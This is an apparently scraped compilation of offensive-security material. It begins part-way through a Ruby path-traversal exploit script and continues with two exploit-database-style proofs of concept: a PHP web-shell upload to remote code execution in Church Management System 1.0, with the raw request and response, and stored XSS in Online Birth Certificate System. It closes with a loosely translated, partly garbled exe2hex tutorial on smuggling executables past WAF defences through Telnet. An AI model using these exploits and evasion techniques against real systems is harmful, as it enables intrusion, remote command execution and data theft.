"#{root_url}/interface/main/main_screen.php?auth=login&site=default" params = { 'new_login_session_management' => '1', 'authProvider' => 'Default', 'authUser' => user, 'clearPass' => pass, 'languageChoice' => '1' } http.post(vuln_url, form: params).body.to_s end def exploit(root_url, filename, http) vuln_url = "#{root_url}/custom/ajax_download.php?fileName=../../../../../../../../../#{filename}" http.get(vuln_url).body.to_s end begin args = Docopt.docopt(doc) pp args if args['--debug'] if args['exploit'] http = HTTPX.plugin(:cookies).plugin(:follow_redirects) login(args['<url>'], args['<username>'], args['<password>'], http) puts exploit(args['<url>'], args['<filename>'], http) end rescue Docopt::Exit => e puts e.message end

# Exploit Title: Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated) # Date: 07/03/2021 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r) # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html # Version: 1.0 # Tested on: Windows 10 # CVE : N/A # Proof of Concept : 1- Login any user account and change profile picture. 2- Upload any php shell by altering it's extension to .jpg or .png. (i.e test.php.jpg) 3- Before uploading your file, intercept your traffic by using any proxy. 4- Change test.php.jpg file to test.php and click forward. 5- Find your test.php file path and try any command. ###################### REQUEST ########################################## GET /cman/members/uploads/test.php?cmd=SYSTEMINFO HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: image/webp,*/* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://localhost/cman/members/dashboard.php Cookie: PHPSESSID=cne8l4ct93krjqobdus7nv2sjc ####################### RESPONSE ######################################### HTTP/1.1 200 OK Date: Sat, 03 Jul 2021 11:28:16 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3 X-Powered-By: PHP/8.0.3 Content-Length: 4410 Connection: close Content-Type: text/html; charset=UTF-8 Host Name: MRT OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19043 N/A Build 19043 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Multiprocessor Free Registered Owner: Murat System Boot Time: 6/25/2021, 2:51:40 PM System Manufacturer: Dell Inc. System Type: x64-based PC Processor(s): 1 Processor(s) Installed. ############################################################################

# Exploit Title: Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS) # Date: 03 July 2021 # Exploit Author: Subhadip Nag # Author Linkedin: www.linkedin.com/in/subhadip-nag-09/ # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/ # Version: 1.1 # Tested on: Server: XAMPP # Description # Online Birth Certificate System 1.1 is vulnerable to stored cross site scripting (xss) in the registration form because of insufficient user supplied data. # Proof of Concept (PoC) : Exploit # 1) Goto: http://localhost/OBCS/obcs/user/register.php 2) In the first name field, enter the payload: <script>alert(1)</script> 3) Click Register 4) Goto: http://localhost/OBCS/obcs/user/login.php 5) Enter your mobile number, password & click login 6) our XSS attack successfull # PoC image 1) https://ibb.co/7C6g6nK

exe2hexbat is a Python script used to convert Windows PE executable files into batch files and vice versa. Overview exe2hex Encodes the executable binary file into ASCII text format. Then, transfer the results to the target computer (echoing the ASCII file is much easier than echoing the binary data). After exe2hex's output file is executed, restore the original program using or PowerShell (preinstalled on Windows by default). Files can be automatically transferred to the target computer using the built-in Telnet or WinEXE options in exe2hex. Binary EXE - ASCII Text - *Transfer* - Binary EXE Quick start -x Use file or STDIN ( /path/to/binary-program.exe-s)-b to output to BATch/or PoSH (-b file.bat-p powershell.cmd) Usage Example Create BATch PowerShell file: Here I wrote an exe program casually exe2hex -x chaos.exe As you can see, exe2hex converts the exe file into cmd and bat files.Compress file exe2hex -x chaos.exe -b nc.txt -cc [*] exe2hex v1.5.1 [i] Attempting to clone and compress [i] Creating temporary file /tmp/tmp509bq1bl [+] Compression (strip) was successful! (0.0% saved) upx: /tmp/tmp509bq1bl: NotCompressibleException [+] Compression (UPX) was successful! (0.0% saved) [+] Successfully written (BATch) /root/Desktop/nc.txt Help -h,--help #Show help information and exit -x EXE #EXE binary file conversion -s #Read from STDIN -b BAT #BAT output file (DEBUG.exe method-x86) -p POSH #PoSh output file (PowerShell method -x86/x64) -e #URL encoding output -r TEXT #pRefix - Text added before each line of command -f TEXT #suFfix - Text added after each line of command -l INT #Maximum hexadecimal value per row -c #Clone and compress files before conversion (use -cc for higher compression) -t # Create an Expect file to automatically perform Telnet sessions. -w # Create an Expect file to automatically execute WinEXE sessions. -v #Enable detailed mode Main uses: Convert binary programs to ASCII hexadecimal files, which can be restored using the built-in operating system program. Works on older and newer versions of Windows without pre-installing any third-party programs. Supports x86 and x64 operating systems. You can use DEBUG.exe or PowerShell to restore files. Ability to compress files before conversion. URL encodes the output. Option to add prefix and suffix text to each line. Ability to set the maximum hexadecimal length for each row. You can use binary files or pipelines in standard input (). STDIN is automatically transmitted via Telnet and/or WinEXE. Telnet login exe2hex.py -x chaos.exe -b chaos.bat -t At this time, a /chao-bat-telnet file will be generated for remote connection. The format is as follows:/klogger-bat-telnet ip username password ./chao-bat-telnet 192.168.123.1 admin admin Welcome to Microsoft Telnet Service login: winxp password: *====================================================================================== Welcome to Microsoft Telnet Server. *====================================================================================== C:\Documents and Settings\winxpcd %TEMP% C:\DOCUME~1\winxp\LOCALS~1\Tempecho 418671.0klogger.bat 418671.0E~1\winxp\LOCALS~1\Temptype klogger.bat C:\DOCUME~1\winxp\LOCALS~1\Temp Postscript exe2hex actually writes our commonly used programs or scripts into batch files such as txt cmd bat. Because some machines' WAF will restrict file upload/download exe. So a method is proposed to bypass these defense mechanisms using exe2hex. Transform it into an encoded form, and finally construct exe again and execute it.